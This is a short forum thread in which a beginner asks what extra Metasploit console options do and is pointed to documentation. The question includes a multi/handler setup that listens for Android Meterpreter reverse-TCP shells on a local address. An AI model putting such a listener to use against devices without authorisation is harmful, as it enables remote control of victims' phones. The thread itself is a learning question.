Results 1 to 3 of 3

Thread: MSF console commands (newbie)

  1. #1
    Join Date
    2015-Nov
    Location
    east tennessee
    Posts
    14

    Unhappy MSF console commands (newbie)

    Is there anyplace that explains all the unique anad extended commands in metesploit?
    for example why would i use "set ExitOnSession false" and "exploit -j -z"
    instead of just exploit for the last line????

    example
    use exploit/multi/handler
    set PAYLOAD android/meterpreter/reverse_tcp
    set LHOST 192.168.1.130
    set LPORT 4444
    set ExitOnSession false ???
    exploit -j -z ???

    my way
    use exploit/multi/handler
    set PAYLOAD android/meterpreter/reverse_tcp
    set LHOST 192.168.1.130
    set LPORT 4444
    exploit

  2. #2
    Join Date
    2016-Dec
    Posts
    806
    Metasploit unleashed might have some of them: https://www.offensive-security.com/m...oit-unleashed/

    But for the others, probably the documentation: https://help.rapid7.com/metasploit/index.html

  3. #3
    Join Date
    2015-Nov
    Location
    east tennessee
    Posts
    14

    Wink

    Quote Originally Posted by Mister_X View Post
    Metasploit unleashed might have some of them: https://www.offensive-security.com/m...oit-unleashed/

    But for the others, probably the documentation: https://help.rapid7.com/metasploit/index.html
    yea i checked them out pretty well before posting , didnt enlighten me much, thanks anyway, But i keep going deeper and deeper in Google and keep coming up with wonderful little tidbit in a lot of different places.

Similar Threads

  1. Character set to console
    By Fabian75 in forum TroubleShooting Archive
    Replies: 0
    Last Post: 2021-04-07, 14:40
  2. autologin console mode
    By sbalymov in forum ARM Archive
    Replies: 1
    Last Post: 2017-07-20, 17:49
  3. Console Login
    By m0nkey in forum General Archive
    Replies: 1
    Last Post: 2013-05-09, 23:09

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •